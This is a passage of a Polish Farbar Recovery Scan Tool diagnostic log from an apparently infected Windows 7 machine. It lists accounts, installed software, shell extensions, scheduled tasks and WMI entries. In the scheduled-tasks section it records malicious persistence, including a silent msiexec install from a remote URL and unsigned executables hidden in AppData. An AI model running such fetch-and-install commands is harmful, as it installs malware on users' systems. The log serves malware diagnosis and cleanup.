Rezultaty skanu uzupełniającego Farbar Recovery Scan Tool (x64) Wersja: 17.03.2019 Uruchomiony przez user (29-03-2019 11:17:12) Uruchomiony z C:\Users\user\Downloads\Nowy folder Windows 7 Professional Service Pack 1 (X64) (2013-12-17 12:25:24) Tryb startu: Safe Mode (minimal) ========================================================== ==================== Konta użytkowników: ============================= Administrator (S-1-5-21-2235225777-535561683-332804176-500 - Administrator - Disabled) Gość (S-1-5-21-2235225777-535561683-332804176-501 - Administrator - Enabled) => C:\Users\Gość HomeGroupUser$ (S-1-5-21-2235225777-535561683-332804176-1002 - Limited - Enabled) karo (S-1-5-21-2235225777-535561683-332804176-1003 - Administrator - Enabled) => C:\Users\karo user (S-1-5-21-2235225777-535561683-332804176-1000 - Administrator - Enabled) => C:\Users\user ==================== Centrum zabezpieczeń ======================== (Załączenie wejścia w fixlist spowoduje jego usunięcie.) AS: Spybot - Search and Destroy (Enabled - Out of date) {4C1D9672-63FE-5C90-371E-8FDA591C5B75} AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} ==================== Zainstalowane programy ====================== (W fixlist dozwolone tylko załączanie programów adware z flagą "Hidden" w celu ich uwidocznienia. Programy adware powinny zostać w poprawny sposób odinstalowane.) 7-Zip 9.20 (x64 edition) (HKLM\...\{23170F69-40C1-2702-0920-000001000000}) (Version: 9.20.00.0 - Igor Pavlov) Adobe Acrobat X Pro - English, Français, Deutsch (HKLM-x32\...\{AC76BA86-1033-F400-7760-000000000005}) (Version: 10.1.16 - Adobe Systems) Adobe CS6 Design and Web Premium (HKLM-x32\...\{402F6F2E-5683-491C-977D-0CA599A07CAF}) (Version: 6 - Adobe Systems Incorporated) Adobe Digital Editions 3.0 (HKLM-x32\...\Adobe Digital Editions 3.0) (Version: 3.0 - Adobe Systems Incorporated) Adobe Flash Player 32 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 32.0.0.142 - Adobe Systems Incorporated) Adobe Help Manager (HKLM-x32\...\chc.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 4.0.244 - Adobe Systems Incorporated) Adobe Shockwave Player 12.1 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.1.7.157 - Adobe Systems, Inc.) Adobe Widget Browser (HKLM-x32\...\com.adobe.WidgetBrowser) (Version: 2.0 Build 348 - Adobe Systems Incorporated.) Adobe® Content Viewer (HKLM-x32\...\com.adobe.dmp.contentviewer) (Version: 3.4.3 - Adobe Systems, Incorporated) AllDup 3.4.24 (HKLM-x32\...\AllDup_is1) (Version: 3.4.24 - Michael Thummerer Software Design) calibre 64bit (HKLM\...\{41253E74-3DAD-4E88-9174-B36A2188A882}) (Version: 3.36.0 - Kovid Goyal) CCleaner (HKLM\...\CCleaner) (Version: 5.22 - Piriform) D3DX10 (HKLM-x32\...\{E09C4DB7-630C-4F06-A631-8EA7239923AF}) (Version: 15.4.2368.0902 - Microsoft) Hidden e-Deklaracje Desktop (HKLM-x32\...\{DF37F034-1762-10B8-4727-A1F5CB72E7AB}) (Version: 10.0.1 - Ministerstwo Finansow) Hidden e-Deklaracje Desktop (HKLM-x32\...\e-Deklaracje.A1909296681C7ACEFE45687D3A64758C8659BF46.1) (Version: 10.0.1 - Ministerstwo Finansow) e-mikrofirma (HKLM-x32\...\{FD8B3CEE-530D-4E86-BA16-E3A78A315147}) (Version: 1.2.1.2 - Aplikacje Krytyczne sp. z o. o.) Everything 1.4.1.895 (x64) (HKLM\...\Everything) (Version: 1.4.1.895 - David Carpenter) Faktura VAT 2014 START v14.1.405 (HKLM-x32\...\Faktura VAT 2014 START_is1) (Version: - ) Folder Size 3.4.0.0 (HKLM-x32\...\{2DFA85ED-588F-4CE3-A175-29E52C3804A8}_is1) (Version: 3.4.0.0 - MindGems, Inc.) Formant ActiveX programu Windows Live Mesh odpowiedzialny za obsługę połączeń zdalnych (HKLM-x32\...\{B04A0E2F-1E4C-4E61-B18E-3B2BD6779CA7}) (Version: 15.4.5722.2 - Microsoft Corporation) Ghostscript GPL 8.64 (Msi Setup) (HKLM-x32\...\_{06CD45E6-FF5E-4D8E-BC01-B276A90DADF2}) (Version: 8.64 - Corel Corporation) Ghostscript GPL 8.64 (Msi Setup) (HKLM-x32\...\{06CD45E6-FF5E-4D8E-BC01-B276A90DADF2}) (Version: 8.64 - Corel Corporation) Hidden HD Tune Pro 5.70 (HKLM-x32\...\HD Tune Pro_is1) (Version: - EFD Software) Intel(R) C++ Redistributables for Windows* on Intel(R) 64 (HKLM-x32\...\{D2437C5C-2D8C-40D2-8059-689AD7239FA3}) (Version: 11.1.048 - Intel Corporation) Intel(R) Control Center (HKLM-x32\...\{F8A9085D-4C7A-41a9-8A77-C8998A96C421}) (Version: 1.2.1.1007 - Intel Corporation) Intel(R) Graphics Media Accelerator Driver (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.2119 - Intel Corporation) Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 6.0.0.1179 - Intel Corporation) Java 8 Update 171 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F64180171F0}) (Version: 8.0.1710.11 - Oracle Corporation) Junk Mail filter update (HKLM-x32\...\{1F6AB0E7-8CDD-4B93-8A23-AA9EB2FEFCE4}) (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden LibreOffice 5.3.0.3 (HKLM-x32\...\{BB258465-D7F3-474E-8754-3436A75956D8}) (Version: 5.3.0.3 - The Document Foundation) Magic MP3 Tagger 2.2.6 (HKLM-x32\...\uniquemagicmp3taggerappid_is1) (Version: - Mathias Kunter) Mesh Runtime (HKLM-x32\...\{8C6D6116-B724-4810-8F2D-D047E6B7D68E}) (Version: 15.4.5722.2 - Microsoft Corporation) Hidden Microsoft .NET Framework 4.6.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.6.01590 - Microsoft Corporation) Microsoft .NET Framework 4.6.2 (Polski) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1045) (Version: 4.6.01590 - Microsoft Corporation) Microsoft Office 2007 Service Pack 3 (SP3) (HKLM-x32\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version: - Microsoft) Microsoft Office File Validation Add-In (HKLM-x32\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation) Microsoft Office Home and Student 2007 (HKLM-x32\...\HOMESTUDENTR) (Version: 12.0.6612.1000 - Microsoft Corporation) Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50907.0 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2017 Redistributable (x64) - 14.15.26706 (HKLM-x32\...\{95ac1cfa-f4fb-4d1b-8912-7f9d5fbb140d}) (Version: 14.15.26706.0 - Microsoft Corporation) Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 (HKLM-x32\...\{7e9fae12-5bbf-47fb-b944-09c49e75c061}) (Version: 14.15.26706.0 - Microsoft Corporation) Microsoft Visual Studio Tools for Applications 2012 (HKLM-x32\...\{89ca2a32-2b52-4595-8dfd-6fe4757958d0}) (Version: 11.0.51108 - Microsoft Corporation) Microsoft Visual Studio Tools for Applications 2015 (HKLM-x32\...\{dd8b09df-3ef8-49f1-bd1a-65278435860b}) (Version: 14.0.23217 - Microsoft Corporation) Microsoft WSE 3.0 (HKLM-x32\...\{EDEA8AB7-7683-4ED2-AA19-E6C078064C0D}) (Version: 3.0.5305.0 - Microsoft Corporation) MozBackup 1.5.1 (HKLM-x32\...\MozBackup) (Version: - Pavel Cvrcek) Mozilla Firefox 66.0.2 (x64 pl) (HKLM\...\Mozilla Firefox 66.0.2 (x64 pl)) (Version: 66.0.2 - Mozilla) Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 60.5.1 - Mozilla) Mozilla Thunderbird 60.5.1 (x86 pl) (HKLM-x32\...\Mozilla Thunderbird 60.5.1 (x86 pl)) (Version: 60.5.1 - Mozilla) MSVC80_x64 (HKLM\...\{68660049-8D48-427C-9FF7-139D8340CDC0}) (Version: 1.0.1.0 - Nokia) Hidden MSVC80_x64_v2 (HKLM\...\{4D668D4F-FAA2-4726-834C-31F4614F312E}) (Version: 1.0.3.0 - Nokia) Hidden MSVC80_x86 (HKLM-x32\...\{212748BB-0DA5-46DE-82A1-403736DC9F27}) (Version: 1.0.1.0 - Nokia) Hidden MSVC80_x86_v2 (HKLM-x32\...\{6D3245B1-8DB8-4A23-9CD2-2C90F40ABAF6}) (Version: 1.0.3.0 - Nokia) Hidden MSVC90_x64 (HKLM\...\{AB071C8B-873C-459F-ACA9-9EBE03C3E89B}) (Version: 1.0.1.2 - Nokia) Hidden MSVC90_x86 (HKLM-x32\...\{AF111648-99A1-453E-81DD-80DBBF6DAD0D}) (Version: 1.0.1.2 - Nokia) Hidden MSXML 4.0 SP2 Parser and SDK (HKLM-x32\...\{716E0306-8318-4364-8B8F-0CC4E9376BAC}) (Version: 4.20.9818.0 - Microsoft Corporation) MSXML 4.0 SP3 Parser (HKLM-x32\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation) MSXML 4.0 SP3 Parser (KB2758694) (HKLM-x32\...\{1D95BA90-F4F8-47EC-A882-441C99D30C1E}) (Version: 4.30.2117.0 - Microsoft Corporation) MySQL Connector/ODBC 5.3 (HKLM\...\{17E48BE8-F0F8-42B6-82D3-7A5840694D79}) (Version: 5.3.6 - Oracle Corporation) NapiProjekt (2.2.0.2399) (HKLM-x32\...\NapiProjekt_is1) (Version: - ) NAPS2 5.3.3 (HKLM-x32\...\NAPS2 (Not Another PDF Scanner 2)_is1) (Version: - Ben Olden-Cooligan) Nexus Mod Manager (HKLM\...\6af12c54-643b-4752-87d0-8335503010de_is1) (Version: 0.65.2 - Black Tree Gaming) NVIDIA Oprogramowanie systemu PhysX 9.13.1220 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.13.1220 - NVIDIA Corporation) NVIDIA Sterownik 3D Vision 337.88 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 337.88 - NVIDIA Corporation) NVIDIA Sterownik dźwięku HD 1.3.30.1 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.30.1 - NVIDIA Corporation) NVIDIA Sterownik graficzny 337.88 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 337.88 - NVIDIA Corporation) NVIDIA Sterownik kontrolera 3D Vision 337.88 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 337.88 - NVIDIA Corporation) Pacote de Idiomas do Microsoft Visual Studio Tools for Applications 2012 x64 Hosting Support - PTB (HKLM\...\{E237254B-36A1-3D27-815E-B37C13BE0796}) (Version: 11.0.51108 - Microsoft Corporation) Hidden Pacote de Idiomas do Microsoft Visual Studio Tools for Applications 2012 x86 Hosting Support - PTB (HKLM-x32\...\{03077B58-6ACF-32CA-B42A-EAA458C295A1}) (Version: 11.0.51108 - Microsoft Corporation) Hidden Panel sterowania NVIDIA 337.88 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.ControlPanel) (Version: 337.88 - NVIDIA Corporation) Hidden PDF Settings CS6 (HKLM-x32\...\{BFEAAE77-BD7F-4534-B286-9C5CB4697EB1}) (Version: 11.0 - Adobe Systems Incorporated) Hidden Platform (HKLM-x32\...\{20D4A895-748C-4D88-871C-FDB1695B0169}) (Version: 1.34 - VIA Technologies, Inc.) Hidden Poczta usługi Windows Live (HKLM-x32\...\{64376910-1860-4CEF-8B34-AA5D205FC5F1}) (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden Podstawowe programy Windows Live (HKLM-x32\...\{7A9D47BA-6D50-4087-866F-0800D8B89383}) (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden Podstawowe programy Windows Live (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3555.0308 - Microsoft Corporation) Realtek Ethernet Controller Driver For Windows Vista and Later (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 1.00.0009 - Realtek) Remove Empty Directories version 2.2 (Admin Editon) (HKLM-x32\...\{06F25DC8-71E2-44E2-805A-F15E15B51C74}_is1) (Version: 2.2 (Admin Editon) - Jonas John) ReNamer (HKLM-x32\...\ReNamer_is1) (Version: 6.9.0.0 - den4b Team) Scan Tailor (HKLM-x32\...\Scan Tailor) (Version: - ) Sigil 0.9.12 (HKLM\...\Sigil_is1) (Version: - Sigil-Ebook) Spybot - Search & Destroy (HKLM-x32\...\{B4092C6D-E886-4CB2-BA68-FE5A99D31DE7}_is1) (Version: 2.7.64.0 - Safer-Networking Ltd.) swMSM (HKLM-x32\...\{612C34C7-5E90-47D8-9B5C-0F717DD82726}) (Version: 12.0.0.1 - Adobe Systems, Inc) Hidden Tablet Wacom (HKLM\...\Wacom Tablet Driver) (Version: 6.3.15-3 - Wacom Technology Corp.) Tag&Rename 3.9.15 (HKLM-x32\...\Tag&Rename_is1) (Version: 3.9.15 - Softpointer Inc) The.Elder.Scrolls.V.Skyrim.Legendary.Edition.With.update1.9+ALLDLCs wersja 1.9 (HKLM-x32\...\{7EA5FBA1-6235-4458-878C-4811617C03D4}}_is1) (Version: 1.9 - Ali213.net) Toon Boom Harmony 14.0 Premium (HKLM-x32\...\{4F638DCC-7080-43DF-BF56-3089A743EAF1}) (Version: 14.0.0 - Toon Boom Animation) Total Commander 64-bit (Remove or Repair) (HKLM\...\Totalcmd64) (Version: 8.50 - Ghisler Software GmbH) Update for 2007 Microsoft Office System (KB967642) (HKLM-x32\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version: - Microsoft) VdhCoApp 1.0.7 (HKLM\...\weh-iss-net.downloadhelper.coapp_is1) (Version: - DownloadHelper) VIA Platforma Menedżera urządzeń (HKLM-x32\...\InstallShield_{20D4A895-748C-4D88-871C-FDB1695B0169}) (Version: 1.34 - VIA Technologies, Inc.) Visual Studio 2010 SP1 Runtime x64 (HKLM\...\{F6305232-7952-4CCE-BDCD-9B2E66591C4A}) (Version: 1.0.0 - Microsoft Corporation) Visual Studio 2010 SP1 Runtime x86 (HKLM-x32\...\{AEA163A5-BA2F-4E63-9529-DE8606AC82A4}) (Version: 1.0.0 - Microsoft Corporation) VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.6 - VideoLAN) WebTablet FB Plugin 64 bit (HKLM\...\Wacom WebTabletPlugin for Internet Explorer and Netscape) (Version: 2.1.0.7 - Wacom Technology Corp.) WhiteClick (HKLM-x32\...\{42465102-2C03-4307-AC77-078EB8EF94A6}) (Version: 4.1.8 - White CLICK) WinDirStat 1.1.2 (HKU\S-1-5-21-2235225777-535561683-332804176-1000\...\WinDirStat) (Version: - ) WinRAR 5.01 (64-bitowy) (HKLM\...\WinRAR archiver) (Version: 5.01.0 - win.rar GmbH) Языковой пакет для поддержки размещения набора средств Microsoft Visual Studio Tools для работы с приложениями 2012 (x64) - RUS (HKLM\...\{25FB53C5-BE4C-3B6C-A0C9-D49A39227E1E}) (Version: 11.0.51108 - Microsoft Corporation) Hidden Языковой пакет для поддержки размещения набора средств Microsoft Visual Studio Tools для работы с приложениями 2012 (x86) - RUS (HKLM-x32\...\{68DC347D-C1C0-3DE2-A53E-CCC71DA53E57}) (Version: 11.0.51108 - Microsoft Corporation) Hidden ==================== Niestandardowe rejestracje CLSID (filtrowane): ========================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) CustomCLSID: HKU\S-1-5-21-2235225777-535561683-332804176-1000_Classes\CLSID\{B476B564-EAC5-15C1-009B-2227FB66604F}\InprocServer32 -> C:\Windows\system32\ole32.dll (Microsoft Windows -> Microsoft Corporation) ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => -> Brak pliku ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => -> Brak pliku ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => -> Brak pliku ShellIconOverlayIdentifiers: [ 0Cloudfogger] -> {15EDBCBF-7231-4290-946E-5BB12C6AF342} => -> Brak pliku ShellIconOverlayIdentifiers: [ 1Cloudfogger] -> {14A3EC74-D852-416A-9691-AC3096EE1953} => -> Brak pliku ShellIconOverlayIdentifiers: [ 2Cloudfogger] -> {E9C2814C-12B8-4D74-9551-16DDEBFC8AE4} => -> Brak pliku ShellIconOverlayIdentifiers-x32: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => -> Brak pliku ShellIconOverlayIdentifiers-x32: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => -> Brak pliku ShellIconOverlayIdentifiers-x32: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => -> Brak pliku ShellIconOverlayIdentifiers-x32: [ 0Cloudfogger] -> {15EDBCBF-7231-4290-946E-5BB12C6AF342} => -> Brak pliku ShellIconOverlayIdentifiers-x32: [ 1Cloudfogger] -> {14A3EC74-D852-416A-9691-AC3096EE1953} => -> Brak pliku ShellIconOverlayIdentifiers-x32: [ 2Cloudfogger] -> {E9C2814C-12B8-4D74-9551-16DDEBFC8AE4} => -> Brak pliku ShellIconOverlayIdentifiers-x32: [DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => -> Brak pliku ShellIconOverlayIdentifiers-x32: [DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => -> Brak pliku ShellIconOverlayIdentifiers-x32: [DropboxExt3] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => -> Brak pliku ShellIconOverlayIdentifiers-x32: [DropboxExt4] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => -> Brak pliku ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2010-11-18] (Igor Pavlov) [Brak podpisu cyfrowego] ContextMenuHandlers1: [Adobe.Acrobat.ContextMenu] -> {D25B2CAB-8A9A-4517-A9B2-CB5F68A5A802} => C:\Adobe Web Premium\Acrobat 10.0\Acrobat\..\Acrobat Elements\ContextMenu64.dll [2015-09-24] (Adobe Systems, Incorporated -> Adobe Systems Inc.) ContextMenuHandlers1: [AIMP] -> {1F77B17B-F531-44DB-ACA4-76ABB5010A28} => -> Brak pliku ContextMenuHandlers1: [ANotepad++64] -> [CC]{B298D29A-A6ED-11DE-BA8C-A68E55D89593} => -> Brak pliku ContextMenuHandlers1: [Cloudfogger] -> {E09D6A98-0E52-406B-8C91-362D40739535} => -> Brak pliku ContextMenuHandlers1: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> Brak pliku ContextMenuHandlers1: [SDECon32] -> {44176360-2BBF-4EC1-93CE-384B8681A0BC} => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDECon64.dll [2018-03-23] (Safer-Networking Ltd. -> Safer-Networking Ltd.) ContextMenuHandlers1: [SDECon64] -> {44176360-2BBF-4EC1-93CE-384B8681A0BC} => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDECon64.dll [2018-03-23] (Safer-Networking Ltd. -> Safer-Networking Ltd.) ContextMenuHandlers1: [TagRenameShellExt] -> {B806EC81-446D-40C8-A955-315B8519E938} => C:\Program Files (x86)\TagRename\TRShell64.dll [2015-05-12] (Softpointer Inc -> Sofpointer Inc) ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2013-12-03] (Alexander Roshal) [Brak podpisu cyfrowego] ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2013-12-03] (Alexander Roshal) [Brak podpisu cyfrowego] ContextMenuHandlers2: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> Brak pliku ContextMenuHandlers3: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> Brak pliku ContextMenuHandlers4: [###MegaContextMenuExt] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> Brak pliku ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2010-11-18] (Igor Pavlov) [Brak podpisu cyfrowego] ContextMenuHandlers4: [AIMP] -> {1F77B17B-F531-44DB-ACA4-76ABB5010A28} => -> Brak pliku ContextMenuHandlers4: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> Brak pliku ContextMenuHandlers5: [Cloudfogger] -> {E09D6A98-0E52-406B-8C91-362D40739535} => -> Brak pliku ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\Windows\system32\igfxpph.dll [2010-04-21] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation) ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\Windows\system32\nvshext.dll [2014-05-20] (NVIDIA Corporation -> NVIDIA Corporation) ContextMenuHandlers6: [Adobe.Acrobat.ContextMenu] -> {D25B2CAB-8A9A-4517-A9B2-CB5F68A5A802} => C:\Adobe Web Premium\Acrobat 10.0\Acrobat\..\Acrobat Elements\ContextMenu64.dll [2015-09-24] (Adobe Systems, Incorporated -> Adobe Systems Inc.) ContextMenuHandlers6: [Fast Explorer] -> {693BE9C0-BEC3-11D2-B4C1-C33BBD3AD64B} => C:\ProgramData\AllDup\FEShlExt.dll [2008-08-20] (Alex Yakovlev) [Brak podpisu cyfrowego] ContextMenuHandlers6: [SDECon32] -> {44176360-2BBF-4EC1-93CE-384B8681A0BC} => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDECon64.dll [2018-03-23] (Safer-Networking Ltd. -> Safer-Networking Ltd.) ContextMenuHandlers6: [SDECon64] -> {44176360-2BBF-4EC1-93CE-384B8681A0BC} => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDECon64.dll [2018-03-23] (Safer-Networking Ltd. -> Safer-Networking Ltd.) ContextMenuHandlers6: [TagRenameShellExt] -> {B806EC81-446D-40C8-A955-315B8519E938} => C:\Program Files (x86)\TagRename\TRShell64.dll [2015-05-12] (Softpointer Inc -> Sofpointer Inc) ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2013-12-03] (Alexander Roshal) [Brak podpisu cyfrowego] ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2013-12-03] (Alexander Roshal) [Brak podpisu cyfrowego] ==================== Zaplanowane zadania (filtrowane) ============= (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) Task: {06D4F777-E5C2-4DFF-B77C-C658ADE23922} - System32\Tasks\Opera scheduled Autoupdate 711520318 => C:\Users\user\AppData\Roaming\Microsoft\Windows\atdciudr\vvsjbjiv.exe (Auslogics) [Brak podpisu cyfrowego] Task: {1518B256-9EC3-4084-86AE-4060D3D6D505} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Refresh immunization => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDImmunize.exe (Safer-Networking Ltd. -> Safer-Networking Ltd.) Task: {3382C5BE-304B-4AE7-86A9-8ED83C2A4332} - System32\Tasks\One System Care Monitor => C:\Program Files (x86)\OneSystemCare\CleanupConsole.exe <==== UWAGA Task: {3661E9DC-15A8-4CE0-8F73-1B8E2B76DC31} - System32\Tasks\{7C43039F-868D-2B2D-6F56-96BCFE1D923C} => "msiexec.exe" /q /i hxxps://refreshnerer711rb.info/6XluDaNWoH.3pO <==== UWAGA Task: {5FDA69ED-5953-4605-B051-85FC35141F86} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe (Piriform Ltd -> Piriform Ltd) Task: {8CF7D11A-E220-4400-BFAE-5A93800639A2} - System32\Tasks\B-9-4-44-1297031368-1160386914-1361099068-6131\{83POX9EQ-91V5-41K4-6EFB-UGSZS3DNCEBX} => C:\Users\user\AppData\Roaming\x86_microsoft-windows-font-fms.resources_31bf3856ad364e35_6.1.7600.16385_de-de_21e6b954573c0a1e\hlink.exe (ApiSet Stub DLL) [Brak podpisu cyfrowego] Task: {8E2227F1-D21D-42D3-9394-B287DBFCD21A} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Scan the system => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDScan.exe (Safer-Networking Ltd. -> Safer-Networking Ltd.) Task: {A8D4E625-6C6F-45C0-8C28-40DB4D99A1C3} - System32\Tasks\{14A53F9D-1CC7-44CE-93C0-305185110475} => C:\Windows\system32\pcalua.exe -a G:\INSTALL.EXE -d G:\ Task: {D56A2AF2-418D-4F64-9A45-D5D6EA9C9402} - System32\Tasks\{0580CD35-433F-CED3-4F61-3D8278FF8688} => C:\Users\user\VeOIcpuyeqim.exe (Microsoft Windows -> Microsoft Corporation) Task: {E51FC9A7-C1AA-4D9B-980D-4314AAA7F582} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Check for updates => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe (Safer-Networking Ltd. -> Safer-Networking Ltd.) (Załączenie wejścia w fixlist spowoduje przesunięcie pliku zadania (.job). Plik uruchamiany docelowo przez zadanie nie zostanie przeniesiony.) ==================== Skróty & WMI ======================== (Wybrane wejścia mogą zostać załączone w celu ich zresetowania lub usunięcia.) WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"BVTConsumer\"",Filter="__EventFilter.Name=\"BVTFilter\":: WMI:subscription\__EventFilter->BVTFilter::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99] WMI:subscription\CommandLineEventConsumer->BVTConsumer::[CommandLineTemplate => cscript KernCap.vbs][WorkingDirectory => C:\\tools\\kernrate] Shortcut: C:\Users\user\Documents\Skróty\TriangulateImage5.bat — skrót.lnk -> J:\00. graficzne\TI_5_windows64(1)\application.windows64\TriangulateImage5.bat (Brak pliku) Shortcut: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Ministerstwo Finansów\Aplikacje Krytyczne sp. z o. 